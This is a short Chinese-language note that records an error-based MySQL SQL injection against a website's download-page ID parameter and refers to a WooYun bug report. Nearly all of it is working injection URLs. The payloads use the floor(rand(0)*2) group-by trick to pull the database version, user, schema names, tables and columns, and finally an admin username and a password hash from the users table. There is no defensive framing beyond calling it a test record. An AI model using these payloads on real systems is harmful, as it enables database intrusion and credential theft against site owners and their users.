http://www.wooyun.org/bugs/wooyun-2010-01666
之前想找个测试，没想到这有，可以测试下，做个记录而已。
http://xxoo/download/downpage/netarea/id/1600003'+and+(select+1+from(select+count(*),concat(0x7c,(select+(Select+version())+from+information_schema.tables+limit+0,1),0x7c,floor(rand(0)*2))x+from+information_schema.tables+group+by+x+limit+0,1)a)%23/wapc/5000_0005_003
/data0/htdocs/leqi_new/app/myapp.php
或者
/**********version()**********/ 5.1.49-log
http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+version()),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_003
/**********user()**********/
http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+user()),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_003
/**********database()**********/ leqi
http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+database()),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_003
/**********limit依次递归爆库**********/
http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+schema_name+from+information_schema.schemata+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_003
information_schema
http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+schema_name+from+information_schema.schemata+limit+1,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_003
leqi
http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+schema_name+from+information_schema.schemata+limit+2,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_003
test
/**********limit依次递归爆表名**********/
http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+table_name+from+information_schema.tables+where+table_schema=0x6C657169+limit+200,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_003
users
/**********limit依次递归爆字段名**********/
http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+column_name+from+information_schema.columns+where+table_schema=0x6C657169+and+table_name=0x7573657273+limit+3,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_003
user_id,username,nickname,passwd,group_id
http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+group_id+from+users+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23
/wapc/5000_0005_003
11 21（每个值末尾的 1 是 concat 中拼接的 floor(rand(0)*2) 的输出，并非字段值本身）
http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+user_id+from+users+limit+1,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23
/wapc/5000_0005_003
11 341 351 361
/**********爆数据**********/
http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+username+from+users+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23
admin
http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+passwd+from+users+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23
6a8b4574ca231eb8bd52764d4978ffcd